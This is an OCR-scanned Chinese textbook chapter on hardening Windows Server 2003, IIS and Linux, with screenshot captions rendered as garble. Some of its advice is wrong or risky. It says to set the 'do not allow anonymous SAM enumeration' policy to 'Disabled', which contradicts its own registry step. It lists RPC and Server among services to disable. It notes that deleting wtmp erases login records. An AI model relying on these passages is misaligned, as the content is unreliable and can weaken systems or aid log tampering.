默认 安装 时 审核 策略 是 关闭 的 。 激 活 此 功能 有 利于 管理 员 很 好 地 掌握 机 器 的 状态 ， 有 
利于 系统 的 入 侵 检测 。 可 以 从 日 志 中 了 解 到 计算 机 是 否 在 被 攻击 、 是 否 有 非法 的 文件 访问 
等 。 开 启 安全 审核 是 系统 最 基本 的 入 侵 检测 方法 。 当 攻击 者 尝试 对 系统 进行 某 些 方式 (如 尝 
试用 户口 令 、 改 变 账号 策略 、 未 经 许可 的 文件 访问 等 ) 入 侵 ， 都 会 被 安全 审核 记录 下 来 。 

下 面 的 这 些 审核 是 必须 开启 的 : 审核 账户 登录 事件 、 审 核 账户 管理 、 审 核 登录 事件 、 
审核 对 象 访问 、 审 核 策略 更 改 、 审 核 特 权 使 用 、 审 核 系统 事件 ， 其 他 的 可 以 根据 需要 增 
加 ， 如 图 3.3 所 示 。 
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市 本 地 安全 设置 ”了 一 
文件 外 ”操作 各 ”查看 WW 天 助人 0 
千 销 | 固 | 四 |X 密 罗 | 多 


制 策 略 
电 芋 安全 策略, 在 本 地 计算 机 


3.3 ”审核 策略 设置 


(4) 用 户 权 限 分 配 。 

(5) 安全 选项 。 

在 “安全 选项 ”中 ， 右 击 “网 络 访问 : 不 允许 SAM 账户 和 共享 的 匿名 枚 举 ”， 在 弹 
出 的 快捷 菜单 中 选择 “属性 ”命令 ， 打 开 “ 网 络 访问 : 不 允许 SAM 账户 和 共享 的 匿名 枚 
举 属性 ”对 话 框 ， 将 其 属性 设置 为 “已 禁用 ”， 如 图 3.4 所 示 。 
网 络 访问 : 不 允许 SA 帐户 和 共享 的 匿名 校 尘 改 竹 ? 
国 网 络 访问 : 不 允许 SA 帐户 和 共享 的 匿名 权 举 


图 3.4 “网 络 访问 : 不 允许 SAM 账户 和 共享 的 匿名 枚 举 属性 ”对 话 框 


也 可 以 通过 修改 注册 表 中 的 值 来 禁止 建立 空 连 接 :， 选 择 “ 开 始 ”|“ 运 行 ”菜单 命令 ， 
打开 “运行 ”对 话 框 ， 输 入 “regedit.exe”， 打 开 “ 注 册 表 编辑 器 ”对 话 框 ， 如 图 3.5 所 示 ， 
选择 Hkey Local Machine\ System\ CurrentControlSet\Control\Lsa 中 的 restrictanonymous 并 
右 击 ， 在 弹出 的 快捷 菜单 中 选择 “修改 ”命令 ,打开 “编辑 DWORD 值 ” 对 话 框 ， 将 “ 数 
值 数 据 ” 改 为 1， 如 图 3.6 所 示 。 此 举 可 以 有 效 地 防止 利用 IPCS$ 空 连接 枚 举 SAM 账号 和 共 
享 资源 ， 造 成 系统 信息 泄露 。 
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>” 注册 表 篇 辑 回 
文件 E) 编辑 到) 查看 收藏 夹 信 ) 帮助 四 
国 croup0rderLis- 本 | 客 
各 1ML [8 forceguest 
a hivelist 8 fullprivilegeauditing 
| IDConfignB linitblankpassvorduse 
轩 Keyboard Layo 由 l1nconpatibilitylevel 


和 Keyboard “| | 加 


居 Lsa 

由 - 国 NedisCategori 
人 nediaInterfac' 
|] NediaProperti' 
国 Nediahesource: 
人 Wetwork 

a HetworkFrovid, 


Ox00000001 (1) 

Ox00000001 (1) 

1 0x00000001 (1) 
REG MULTI_SZ kerberos msvl_(. 


| 我 的 电脑 \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 


3.5 修改 注册 表 中 restrict anonymous 的 值 


篇 辑 DY0ED 值 了 | xx| 
数值 名 称 @g) : 


Festrictanonymous 


3.6 “编辑 DWORD 值 ” 对 话 框 


5) 加 强 对 Administrator 账号 和 Guest 账号 的 管理 监控 

将 Administrator 账号 重新 命名 ， 新 建 一 个 陷阱 账号 ， 名 为 Administrator， 口 令 为 10 
位 以 上 的 复杂 口令 ， 其 权限 设置 成 最 低 ， 即 将 其 设 为 不 隶属 于 任何 一 个 组 ， 并 通过 安全 审 
核 ， 借 此 发 现 攻击 者 的 入 侵 企图 。 设 置 两 个 管理 员 用 账号 : 一 个 具有 一 般 权 限 ， 用 来 处 理 

些 日 常事 务 ， 另 一 个 具有 管理 员 权限 ， 只 在 需要 的 时 候 使 用 。 修 改 Guest 用 户口 令 为 复 

杂 口 令 ， 或 者 禁用 GUEST 用 户 账号 。 

6) 清除 页 面 文件 

选择 “开始 ”一 “运行 ”菜单 命令 ， 打 开 “ 运 行 ”对 话 框 ， 输 入 “regeditexe”， 打 开 
“注册 表 编 辑 器 ”窗口 ， 修 改 其 中 HKLM\SYSTEM\CurrentControlSet\Control\SessionManagern\ 
MemoryManagement 中 Clear Page File At Shutdown 的 值 为 1， 可 以 禁止 系统 产生 页 面 文件 ， 
防止 信息 泄露 ， 如 图 3.7 所 示 。 
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“注册 表 篇 辑 回 =I9|x 
文件 全) 编辑 到 ) 查看 名 收 阅 来 亿 ) 必 助 Qf) 

国 DOs Devices 

人 Enviroment 

a Executive 

a FileRenaneDperation 

园 kernel 

园 KnownDlLs 辆 Fonpagedpoolguota 


日 Nenory Nanagement 国 NonPaeedPoolSize 
a PrefetchParanete 


PagedPoolQuot. 
oe 加 国 PagedPoolQuota 


PagedPoolsize 
SFC i : 
i a blPagingFiles SZ f:\pagefile. sys ¢ 
生 setwp PhysicalhddressExten .. 0x00000000 (0) 


0 |SecondLevelDatacache REG DWORD -oxoo000000 (0) 本 
| [4 4 4 


于 的 电脑 YKEY_LDCAL_ NACHINENSYSTEN\CurrentControlSet\Control\Session Nanager\lenory lanagement 考 


图 3.7 清除 页 面 文 件 
7) 清除 Dump 文件 
选择 “控制 面板 ”一 “系统 ”一 “高 级 ”一 “启动 和 故障 恢复 ”选项 打开“ 启动 和 
故障 恢复 ”对 话 框 ， 将 “ 写 入 调试 信息 ” 改 成 “无 ”， 可 以 清除 Dump 文件 ， 防 止 信息 泄 
露 ， 如 图 3.8 所 示 。 


三 系统 牛 动 
默认 操作 系统 外): 
rinaws Server 2003, Enterprise” /fastdetect /NoExe | 
厅 显示 操作 系统 列表 的 时 间 加 ) ; 田 司 秒 
厂 在 需要 时 显示 恢复 选项 的 时 间 四 ) 反 习 W 
要 手动 编辑 启动 选项 文件 ， 请 单 击 “ 编 辑 ”。 编辑 下) | 
三 系 统 失败 
区 将 事件 写 入 系统 日 志 WV) 


苇 防 交 笠 
Si THF 
克 敌 苦 竹 何 现 有 文件 人 0 


Ca | we | 


图 3.8 清除 Dump 文件 


8) 防范 NetBIOS 漏洞 攻击 

在 局 域 网 内 部 使 用 NetBIOS 协议 可 以 非常 方便 地 实现 消息 通信 ， 但 是 如 果 在 Internet 
中 ，NetBIOS 就 相当 于 一 个 后 门 程序 ， 很 多 攻击 者 都 是 通过 NetBIOS 漏洞 发 起 攻击 的 。 

NetBIOS(Network Basic Input Output System， 网 络 基 本 输入 输出 系统 ) 是 一 种 程序 
接口 (APD， 系 统 可 以 利用 WINS( 管 理 计算 机 NetBIOS 名 和 人 P 映射 关系 ) 服 务 、 广 播 及 
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Lmhost 文件 等 多 种 模式 将 NetBIOS 名 解析 为 相应 瑟 地 址 ， 从 而 实现 信息 通信 。 
【 例 3.2】 对 于 Windows Server 2003 系统 而 言 ， 可 以 通过 以 下 方式 来 设置 。 
(1) 首先 选择 “开始 ”一 “设置 ”一 “控制 面板 ”一 “网 络 和 拨号 连接 ”一 “本 地 连 
接 ” 命 令 ， 双 击 Intemet 协议 (TCP/IP)， 打 开 如 图 3.9 所 示 的 “Internet 协议 (TCP/IP) 属 性 ” 


议 (TCP/IP) 尾 性 


192 .168 . 0 -41 
| [es e525 0 | 
| 192 .168 


255 .255 .255 . 0 
188. .1 
202 .102 .128 .68 


图 3.9 “Internet 协 议 (TCP/IP) 属 性 ”对 话 框 


(2) 单 击 “高 级 ”按钮 ， 打 开 如 图 3.10 所 示 的 “高 级 TCP/IP 设置 ”对 话 框 ， 选 择 “ 选 
项 ”选项 卡 。 


3.10 “高 级 TCP/IP 设置 ”对 话 框 的 “选项 ”选项 卡 
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G) 单 击 


“属性 ”按钮 ， 打 开 “TCP/IP 筛选 ”对 话 框 ， 选 中 “启用 


适配器 )” 复 选 枉 ， 如 图 3.11 所 示 。 


9) Web 月 
We 


vw 


TCP/IP 芋 选 


全 全 部 允许 外 ) 他 全 部 允许 旭 
个 只 允许 外 一 一 个 只 允许 名 一 一 
TCF 端口 WP 端口 
添加 | 添加 .. 。 
开除 厢 | 贡院 厢 | 


全 全 部 允许 


个 只 允许 册 一 一 


沃 加 | 
开除 扩 | 


Cw ] ws | 


图 3.11 “TCP/IP 筛选 ”对 话 框 
(4) 在 “TCP 端口 ”中 添加 除 139 之 外 要 用 到 的 服务 端口 即 可 。 


妥 务 安全 设置 


民 务 和 FTP 服务， 建议 采取 以 下 措施 。 


TCP/IP 第 选 (所 有 


(1) 在 安装 时 不 要 选择 IIS 服务 ， 安 装 完毕 后 手动 添加 该 服务 ， 将 其 安装 目录 设置 为 如 
D:\INTE 等 任意 字符 ， 以 加 大 安全 性 。 
Internet 服务 管理 器 ， 删 除 样本 页 面 和 脚本 ， 撮 载 Intemet 打印 服务 ， 删 除 除 


(2) 删除 


ASP 外 的 应 上 


程序 映射 。 


(3) 针对 
(4) 对 及 


(5) 对 安 
10) 加 国 


不 同类 型 文件 建立 不 同文 件 夹 并 设置 不 同 权限 。 
本 程序 设 为 纯 脚 本 执行 许可 权限 ， 二 进 制 执行 文件 设置 为 脚本 和 可 执行 程序 
权限 ， 静 态 文件 设置 为 读 权 限 。 


全 扫描 出 的 CGI 漏洞 文件 要 及 时 删除 。 
IIS 服务 器 的 安全 


针对 Windows 系统 的 攻击 几乎 都 偏重 在 IS 上 ， 如 2001 年 、2002 年 的 Nimda、 
CodeRed 病毒 等 都 是 利用 IIS 漏洞 入 侵 并 且 开始 传播 的 。 由 于 Windows Server 2003 系统 上 
使 用 IS 作为 WWW 服务 程序 居多 ， 再 加 上 IIS 的 脆弱 性 以 及 与 操作 系统 相关 性 ， 所 以 通 
过 IS 的 漏洞 入 侵 来 获得 整个 操作 系统 的 管理 员 权限 ， 对 于 一 台 未 经 安全 配置 的 计算 机 来 


说 是 轻而易举 的 ， 因 


因此 ， 配 置 和 管理 好 IIS 在 整个 系统 配置 里 就 显得 举 足 轻 如 


里 。 


IIS 的 配置 可 以 分 为 以 下 几 方 面 (以 下 操作 均 是 使 用 Intemet 信息 服务 管理 器 操作 ， 可 以 
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在 “控制 面板 ”的 管理 工具 里 面 找到 该 快捷 方式 ， 如 图 3.12 所 示 )。 
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天 Iaternet 信息 服务 (LIS) 管 理 器 


+ 信息 服务 
日 员 caDt-sLurFea 地 i | 六 vti_bin 
司 应 用 程序 池 aspnet_client 
日 电网 
号 认 网 站 
由 二 -ti_bin 
aspnet_clier 
总 isages 
慷 lzl 
训 lx2 
由 各 Yetservieel 
rivate 
Ss Di ent | viserint 


六 -tileg 娘 .vti_txt 
司 -vti pvt 国 iisstert htm 
田 轩 vti_seript | 辐 Paeerror. gif 
vti_txt 国 postinfo htnl 
四 侠 wicroseft share| 辐 _vti_inE htnl 
时 Yeb 服务 扩展 
1 


3.12 Internet 信息 服务 (1S) 管 理 器 


(1) 删除 目录 映射 。 

默认 的 IIS 安装 目录 是 Ci\inetpub， 建 议 更 改 到 其 他 分 区 的 目录 里 面 ， 如 Di\inetpub 
目录 。 

默认 时 IIS 里 有 Scripts、IISAdmin、IISSamples、MSADC、IISHelp、Printers 这 些 目 
录 映 射 ， 建 议 完 全 删除 IS 的 默认 映射 目录 ， 包 括 在 服务 器 上 真实 的 路 径 (%systemroot% 是 
一 个 环境 变量 ， 在 具体 每 台 服务 器 上 可 能 不 一 样 ， 默 认 值 由 安装 时 选择 目录 决定 )。 

Scripts 对 应 Ci\inetpub\scripts 目录 。 

IISAdmin 对 应 %systemroot%\System32\inetsrv\iisadmin 目录 。 

IISSamples 对 应 Ci\inetpub\iissamples 目录 。 

MSADC 对 应 Ci\program files\common files\system\msadc 目录 。 

IISHelp 对 应 %systemroot%\help\iishelp 目录 。 

Printers 对 应 %systemroot%6Web\printers 目录 。 

IS 管理 员 页 面目 录 如 下 。 

IISADMPWD 对 应 %systemroot%\system32\inetsrv\iisadmpwd 目录 。 

IISADMIN 对 应 %systemroot%\system32\inetsrv\iisadmin 目录 。 

(2) 删除 可 执行 文件 扩展 名 (应 用 程序 ) 映 射 。 

@ 在 Internet 信息 服务 管理 器 窗口 中 ， 选 择 “ 默 认 网 站 ”一 “属性 ”选项 ， 打 开 “ 默 
认 网 站 属性 ”对 话 框 ， 如 图 3.13 所 示 。 
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efaaltAppPool 


图 3.13 “默认 网 站 属性 ”对 话 框 
@ 在 该 对 话 框 中 单 击 “ 配 置 ”按钮 ， 默 认 有 以 下 程序 映射 ， 如 图 3.14 所 示 。 


C: \WINDOWS\Microsoft. NET\Fram. .. 
C: MWINDOWS\Microsoft. NET\Fram. .. 
C: MWINDOWS\Microsoft. NET\Fram. .. 
C: DO 全 20， i 


图 3.14 “应 用 程序 配置 ”对 话 框 


如 果 不 使 用 SSI(Server Side Include， 服 务 器 端 嵌 入 脚本 )， 建 议 删 除 .shtm 、.stm 
和 .shtml 这 些 映 射 项 ， 建 议 只 保留 .asp 和 .asa 的 映射 。 


.TAN. 


第 3 章 ， 操 作 系统 安全 技术 本 


(3) FrontPage 扩展 服务 。 

@ 选择 “开始 ”一 “设置 ”一 “控制 面板 ”菜单 命令 ， 打 开 “ 控 制 面板 ”窗口 ， 双 击 
“添加 或 删除 程序 ”图 标 ， 打 开 “ 添 加 或 删除 程序 ”窗口 ， 选 择 “添加 /删除 i 组 
件 ”， 打 开 “Windows 组 件 向 导 ” 对 话 框 ， 如 图 3.15 所 示 。 


Yindows 钥 件 向 导 x 


Tindors 组 件 
可 以 添加 或 删除 Yindows 的 组 件 。 


te 


口 加 远程 安装 服务 1.9 上 Ea 
门 最 远程 看 储 3.5 吗 到 
描述 : on ASP. NET ,Internet 信息 服务 CTS) 和 应 用 程序 服务 器 控制 


所 需 磁 盘 空间 : 12.7 IB 
可 用 磁盘 空间 : 457 0 皮 详细 信息 D.… 


mm | 两 | 


3.15 “Windows 组 件 向 导 ” 对 话 框 


@ 选中 列表 框 中 的 “应 用 程序 服务 器 ” 复 选 框 ， 单 击 “ 详 细 信 息 ” 按 钮 ， 打 开 “ 应 用 
程序 服务 器 ”对 话 框 ， 如 图 3.16 所 示 。 


应 用 各 施 野 和 吕 = 
ee 


应 用 程序 服务 器 的 子 组 件 C): 


ITS 包括 Webs FIP， FrontPage Server 
ee 


图 3.16 “应 用 程序 服务 器 ”对 话 框 


@ 选中 列表 框 中 的 “Intemet 信息 服务 (IS)” 复 选 框 ， 单 击 “ 详 细 信 息 ” 按 钮 ， 打 开 
“Internet 信息 服务 (IIS)” 对 话 框 ， 确 认 FrontPage 2002 Server Extensions 复 选 框 未 被 选 
中 ， 如 图 3.17 所 示 ， 单 击 “ 确 定 ”按钮 。 
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口 世 Internet 打印 
加 往 Iaternet 信息 服务 巷 理 器 
D mr service 


Er ME 全 
图 3.17 “Internet 信息 服务 (IIS)” 对 话 框 


(4) FTP 文件 传输 服务 。 


尽量 不 要 使 用 系统 自 带 的 FTP 服务 ， 因 
后 果 十 分 严重 。 建 议 利 


为 该 服务 与 系统 账户 集成 认证 ， 一 旦 密码 泄露 
第 三 方 软件 Serv-U 提供 的 FTP 服务 ， 该 软件 采用 单 向 Hash 函数 


户口 令 ， 加 密 后 的 口令 保存 在 ServUDaemon.ini 或 是 注册 表 中 ; 用户 权 限 管 


民 务 自动 处 于 激活 状态 ， 许 多 服务 中 可 能 


Ff 者 甚至 不 需要 账户 就 能 控制 计算 机 。 为 了 系统 的 安全 ， 应 该 关闭 不 


单 命令 ， 打 开 “ 控 制 面板 ”窗口 ， 双 击 


(MD5) 加 密 用 
理 采 用 多 权限 和 模拟 域 方式 ， 并 且 虚 拟 路 径 和 物理 路 径 能 够 随时 变换 。 此 外 ， 利 用 人 P 规 
则 、 用 户 权限 、 用 户 域 、 用 户口 令 等 多 重 保 护 防 止 非法 入 侵 。 
11) 禁止 不 必要 的 服务 
Windows Server 2003 系统 中 有 许多 不 常用 的 
存在 的 安全 漏洞 使 攻 刘 
常用 的 功能 服务 ， 从 而 大 大 减少 安全 风险 。 
选择 “开始 ”一 “设置 ”一 “控制 面板 ” 菜 
“管理 工具 ”图 标 ， 打 开 “ 管 理工 具 ” 窗 口 ， 双 和 


取 不 必要 的 
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肛 务 进行 禁止 ， 如 图 3.18 所 示 。 


文件 换 作 属 查看 Q) 帮助 0D 


fF “服务” 图标， 打开 “服务 ”窗口 ， 选 


各 六 后 | 办 国 图 | 国 | 1 
服务 (本地) | 名称 ， | 描述 


在 
为 
为 
为 
s 允 
利 
局 
去 
管 
维 
提 
为 
为 
将 
局 
局 
协 
为 


图 3.18 禁止 不 必要 的 服务 
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相关 需要 禁止 的 服务 如 下 。 

(1) Alerter: 系统 管理 级 警报 。 

(2) Application Management: 提供 软件 安装 服务 ， 如 分 派 、 发 布 及 删除 等 。 

(3) ClipBook: 支持 “剪贴 板 查看 器 ”， 从 远程 剪贴 板 查阅 剪贴 页 面 。 

(4) COM+ Event System: 提供 事件 的 自动 发 布 及 订阅 COM 组 件 。 

(5) Computer Browser: 维护 网 络 计算 机 的 最 新 列表 ， 以 及 响应 提供 这 个 列表 的 请 求 。 

(6) Distributed Link Tracking Client: 当 文 件 在 网 络 域 的 NTFS 卷 中 移动 时 发 送 通知 。 

(7) Distributed Transaction Coordinator: 协调 跨 多 个 数据 库 、 消 息 队 列 、 文 件 系统 等 资 
源 管 理 器 的 事务 。 

(8) Fax Service: 发 送 和 接收 传真 。 

(9) FTP Publishing Service: 通过 Internet 信息 服务 的 管理 单元 提供 FTP 连接 和 管理 。 

(10) Indexing Service: 本 地 和 远程 计算 机 上 文件 的 索引 内 容 和 属性 ， 并 提供 文件 快速 
访问 服务 。 

(11) Messenger: 发 送 和 接收 系统 管理 员 以 及 Alerter 服务 传递 的 消息 。 

(12) Net Logon: 支持 网 络 计算 机 Pass-through 账户 登录 身份 验证 事件 。 

(13) Network DDE: 提供 动态 数据 交换 (DDE) 的 网 络 传输 和 安全 特性 服务 。 

(14) Network DDE DSDM: 管理 DDE 共享 动态 数据 交换 。 

(15) Network Monitor: 网 络 监 视 器 。 

(16) NetMeeting Remote Desktop Sharing: 允许 有 权限 的 用 户 使 用 NetMeeting 远程 访问 
Windows 桌面 。 

(17) Plug and Play( 在 配置 好 所 有 硬件 后 应 该 禁止 此 服务 ): 管理 设备 安装 及 配置 ， 并 且 
通知 程序 关于 设备 更 改 的 情况 。 

(18) Remote Procedure Call(RPC): 提供 终 节点 映射 程序 (Endpoint Mapper) 以 及 其 他 
RPC 服务 。 

(19) Remote Registry Service: 允许 远程 注册 表 操 作 。 

(20) Removable Storage: 管理 可 移动 媒体 、 驱 动 程序 和 库 。 

(21) Routing and Remote Access: 在 局 域 网 以 及 广域网 环境 中 为 企业 提供 路 由 服务 。 

(22) Server: 支持 此 计算 机 通过 网 络 的 文件 、 打 印 和 命名 管道 共享 。 

(23) Smart Card: 对 插入 在 计算 机 智能 卡 阅 读 器 中 的 智能 卡 进行 管理 和 访问 控制 。 

(24) Smart Card Helper: 提供 对 连接 到 计算 机 上 旧式 智能 卡 的 支持 。 

(25) Task Schedule: 允许 程序 在 指定 时 间 运 行 。 

(26) TCP/IP Netbios Helper: 提供 TCP/IP(NetBT) 服 务 上 的 NetBIOS 和 网 络 上 客户 端的 
NetBIOS 名 称 解 析 的 支持 。 

(27) Telephone Service: 提供 TAPI 支持 ， 以 便 程序 控制 本 地 计算 机 、 服 务 器 以 及 LAN 
上 的 电话 设备 和 基于 IP 的 语音 连接 。 

(28) Windows Management Instrumentation: 提供 系统 管理 信息 。 
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3.3 Linux 网 络 操作 系统 的 安全 


随 着 Intemet 的 日 益 普及 ， 采 用 Linux 操作 系统 作为 服务 器 的 用 户 也 越 来 越 多 ， 这 一 
方面 是 因为 Linux 是 开放 源 代码 的 免费 正版 软件 ， 另 一 方面 也 是 因为 Linux 系统 具有 较 好 
的 稳定 性 和 安全 性 。 在 使 用 Linux 操作 系统 的 时 候 ， 也 要 详细 分 析 Linux 系统 的 安全 机 
制 ， 找 出 它 可 能 存在 的 安全 隐患 ， 给 出 相应 的 安全 策略 和 保护 措施 是 十 分 必要 的 。 


3.3.1 Linux 网 络 操作 系统 的 基本 安全 机 制 


Linux 网 络 操作 系统 提供 了 用 户 账号 、 文 件 系统 权限 和 系统 日 志文 件 等 基本 安全 机 
制 ， 如 果 这 些 安全 机 制 配置 不 当 ， 就 会 使 系统 存在 一 定 的 安全 隐患 。 


1. Linux 系统 的 用 户 账 号 


在 Linux 系统 中 ， 用 户 账号 是 用 户 的 身份 标志 ， 它 由 用 户 名 和 用 户口 令 两 部 分 组 成 。 
在 Linux 系统 中 ， 系 统 将 输入 的 用 户 名 存放 在 /etc/passwd 文件 中 ， 而 将 输入 的 口令 以 加 密 
的 形式 存放 在 /etc/shadow 文件 中 。 在 正常 情况 下 ， 这 些 口 令 由 操作 系统 保护 ， 能 够 对 其 进 
行 访问 的 只 能 是 超级 用 户 和 操作 系统 的 一 些 应 用 程序 。 但 是 如 果 配 置 不 当 ， 或 者 在 系统 运 
行 出 错 的 情况 下 ， 这 些 信息 可 能 被 普通 用 户 非法 获取 。 进 而 ， 不 怀 好 意 的 用 户 就 可 以 使 用 
“口令 破解 ”工具 得 到 加 密 前 的 口令 。 
2. Linux 的 文件 系统 权限 
Linux 文件 系统 的 安全 主要 是 通过 设置 文件 的 权限 来 实现 的 。 每 一 个 Linux 的 文件 或 
目录 都 有 3 组 属性 ， 分 别 定义 文件 或 目录 的 所 有 者 、 用 户 组 和 其 他 人 的 使 用 权限 (只 读 、 可 
写 、 可 执行 、 允 许 SUID、 人 允许 SGID 等 )。 需 要 注意 的 是 ， 权 限 为 SGID 和 SUID 的 可 执行 
文件 。SGID(SUID) 中 的 S 指 set， 程 序 在 运行 时 其 进程 的 EUID(Effective User ID) 或 
EGID(Effective Group ID) 会 被 设置 成 文件 拥有 者 的 UIDGID， 从 而 进程 也 具有 了 其 Owner 
或 Owner Group 的 权限 。 典 型 的 应 用 是 /bin/passwd 命令 ， 其 Owner 是 root， 权 限 是 4755。 
可 以 想象 ， 如 果 使 用 不 当 ，SGID 和 SUID 程序 会 给 系统 安全 性 带 来 极 大 的 危害 。 某 些 入 侵 
者 暂时 取得 root 权限 后 ， 往 往 会 利用 SGID 或 SUID 程序 为 下 次 进入 系统 留 下 后 门 。 为 了 
防止 这 种 情况 发 生 ， 应 当 定 期 检查 系统 中 的 SUID 和 SGID 程序 。 


3. 合理 利用 Linux 的 日 志文 件 


Linux 的 日 志文 件 用 来 记录 整个 操作 系统 使 用 状况 。 作 为 一 个 Linux 网 络 系统 管理 员 
要 充分 用 好 以 下 几 个 日 志文 件 。 

(1) /var/log/lastlog 文件 。 记 录 最 后 进入 系统 的 用 户 信 息 ， 包 括 登 录 的 时 间 、 登 录 是 否 
成 功 等 。 因 此 ， 普 通用 户 登 录 后 只 要 用 lastlog 命令 查看 /var/log/lastlog 文件 中 记录 的 账号 
的 最 后 登录 时 间 ， 再 与 自己 的 记录 对 比 ， 就 可 以 发 现 该 账号 是 否 被 黑客 盗用 。 

(2) /var/log/secure 文件 。 记 录 系 统 自 开通 以 来 所 有 用 户 的 登录 时 间 和 地 点 ， 可 以 给 系 
统管 理 员 提供 更 多 的 参考 。 
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(3) /var/log/wtmp 文件 。 记 录 当 前 和 历史 上 登录 到 系统 的 用 户 的 登录 时 间 、 地 点 和 注销 
时 间 等 信息 。 可 以 用 last 命令 查看 ， 若 想 清除 系统 登录 信息 ， 只 需 删除 这 个 文件 即 可 。 


3.3.2 Linux 网 络 系统 可 能 受到 的 攻击 


Linux 操作 系统 是 一 种 公开 源 代码 的 操作 系统 ， 因 此 比较 容易 受到 来 自 底层 的 攻击 ， 
系统 管理 员 一 定 要 有 安全 防范 意识 ， 并 对 系统 采取 一 定 的 安全 措施 ， 这 样 才能 提高 Linux 
系统 的 安全 性 。 

对 于 系统 管理 员 来 说 特别 是 要 搞 清楚 对 Linux 网 络 系统 可 能 的 攻击 方法 ， 并 采取 必要 
的 措施 保护 自己 的 系统 。 对 Linux 服务 器 攻击 的 定义 是 ， 攻 击 是 一 种 旨 在 妨碍 、 损 害 、 削 
弱 、 破 坏 Linux 服务 器 安全 的 未 授权 行为 。 攻 击 的 范围 可 以 从 服务 拒绝 直至 完全 危害 和 破 
坏 Linux 服务 器 。 

对 Linux 服务 器 攻击 通常 有 4 类 。 

1. “拒绝 服务 ”攻击 

“拒绝 服务 ”攻击 是 指 黑客 采取 具有 破坏 性 的 方法 阻塞 目标 网 络 的 资源 ， 使 网 络 暂 时 
或 永久 瘫痪 ， 从 而 使 Linux 网 络 服务 器 无 法 为 正常 的 用 户 提供 服务 。 例 如 ， 黑 客 可 以 利用 
伪造 的 源 地 址 或 受 控 的 其 他 地 方 的 多 台 计 算 机 同时 向 目标 计算 机 发 出 大 量 、 连 续 的 TCP/IP 
请 求 ， 从 而 使 目标 服务 器 系统 瘫痪 。 

2. “口令 破解 ”攻击 
令 安 全 是 保卫 自己 系统 安全 的 第 一 道 防线 。“ 口 令 破 解 ”攻击 的 目的 是 为 了 破解 用 
户 的 口令 ， 从 而 可 以 取得 已 经 加 密 的 信息 资源 。 例 如 ， 黑 客 可 以 利用 一 台 高 速 计算 机 ， 配 
合 一 个 字典 库 ， 尝 试 各 种 口令 组 合 ， 直 到 最 终 找 到 能 够 进入 系统 的 口令 ， 打 开 网 络 资源 。 


3. “欺骗 用 户 ” 攻 击 


“欺骗 用 户 ” 攻 击 是 指 网 络 黑客 伪装 成 网 络 公司 或 计算 机 服务 商 的 工程 技术 人 员 ， 向 
用 户 发 出 呼叫 ， 并 在 适当 的 时 候 要 求 用 户 输入 口令 ， 这 是 用 户 最 难 对 付 的 一 种 攻击 方式 
一 旦 用 户口 令 失窃 ， 黑 客 就 可 以 利用 该 用 户 的 账号 进入 系统 。 
4. “扫描 程序 和 网 络 监听 ”攻击 


许多 网 络 入 侵 是 从 扫描 开始 的 ， 利 用 扫描 工具 黑客 能 找 出 目标 主机 上 各 种 各 样 的 漏 
洞 ， 并 利用 它 对 系统 实施 攻击 。 

网 络 监听 也 是 黑客 们 常用 的 一 种 方法 ， 当 成 功 登 录 到 一 台 网 络 上 的 主机 ， 并 取得 这 台 
主机 的 超级 用 户 控 制 权 之 后 ， 黑 客 可 以 利用 网 络 监听 收集 敏感 数据 或 者 认证 信息 ， 以 便 日 
后 夺取 网 络 中 其 他 主机 的 控制 权 。 


3.3.3 Linux 网 络 安全 防范 策略 


Linux 是 一 个 开放 式 系统 ， 可 以 在 网 络 上 找到 许多 现成 的 程序 和 工具 ， 这 既 方 便 了 用 
户 也 方便 了 黑客 ， 因 为 黑客 也 能 很 容易 地 找到 程序 和 工具 来 潜入 Linux 系统 ， 或 者 盗 取 
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Linux 系统 上 的 重要 信息 。 不 过 ， 只 要 仔细 设 定 Linux 的 各 种 系统 功能 ， 并 且 加 上 必要 的 
安全 措施 ， 就 能 让 黑客 们 无 机 可 乘 。 


1. 仔细 设置 每 个 内 部 用 户 的 权限 


为 保护 Linux 网 络 系统 的 资源 ， 在 给 内 部 网 络 用 户 开 设 账 号 时 ， 要 仔细 设置 每 个 内 部 
用 户 的 权限 ， 一 般 应 遵循 “最 小 权限 ”原则 ， 也 就 是 仅 给 每 个 用 户 授予 完成 他 们 特定 任务 
所 必需 的 服务 器 访问 权限 。 虽 然 这 样 做 会 大 大 加 重 系 统管 理 员 的 管理 工作 量 ， 但 是 为 了 整 
个 网 络 系统 的 安全 还 是 应 该 坚持 这 个 原则 。 


2. 确保 用 户口 令 文 件 /etc/shadow 的 安全 


对 于 网 络 系统 而 言 ， 口 令 是 比较 容易 出 问题 的 地 方 ， 作 为 系统 管理 员 应 告诉 用 户 在 设 
置 口令 时 要 使 用 安全 口令 (在 口令 序列 中 使 用 非 字母 、 非 数字 等 特殊 字符 )， 并 适当 增加 口 
令 的 长 度 ( 大 于 6 个 字符 )。 系 统管 理 员 要 保护 好 /etc/passwd 和 /etc/shadow 这 两 个 文件 的 安 
全 ， 不 让 无 关 人 员 获 得 这 两 个 文件 ， 这 样 黑 客 利 用 John 等 程序 对 /etc/passwd 和 /etc/shadow 
文件 进行 字典 攻击 以 获取 用 户口 令 的 企图 就 无 法 进行 。 系 统管 理 员 要 定期 用 John 等 程序 对 
本 系统 的 /etc/passwd 和 /etc/shadow 文件 进行 模拟 字典 攻击 ， 一 旦 发 现 有 不 安全 的 用 户 
令 ， 要 强制 用 户 立即 修改 。 

字典 攻击 : 收集 好 密码 可 能 包含 的 字符 串 ， 然 后 通过 各 种 方式 组 合 。 即 相当 于 从 字典 
中 查 密 码 ， 逐 一 验证 。 

字典 软件 : 这 是 一 个 可 以 自动 编写 密码 的 软件 ， 它 的 功能 是 编写 密码 ， 是 结合 其 他 暴 
力 破 解 软 件 的 一 种 工具 。 生成 后 可 以 利用 流光 等 软件 ， 是 破解 密码 的 一 种 方式 ， 也 就 是 
猜 密码 ， 只 不 过 用 计算 机 来 完成 。 比 如 : 有 个 密码 要 猜测 ， 那 就 让 计算 机 程序 去 一 个 一 个 
测试 ， 拿 什么 去 测试 ， 就 是 字典 了 ， 在 文件 中 输入 一 些 字符 ， 如 一 个 文件 内 容 为 1 2 3 4， 
那 计算 机 就 先 从 1 开始 到 4， 如 12 13 14 等 。 

3. 加 强 对 系统 运行 的 监控 和 记录 

Linux 网 络 系统 管理 员 应 对 整个 网 络 系统 的 运行 状况 进行 监控 和 记录 ， 这 样 通过 分 析 
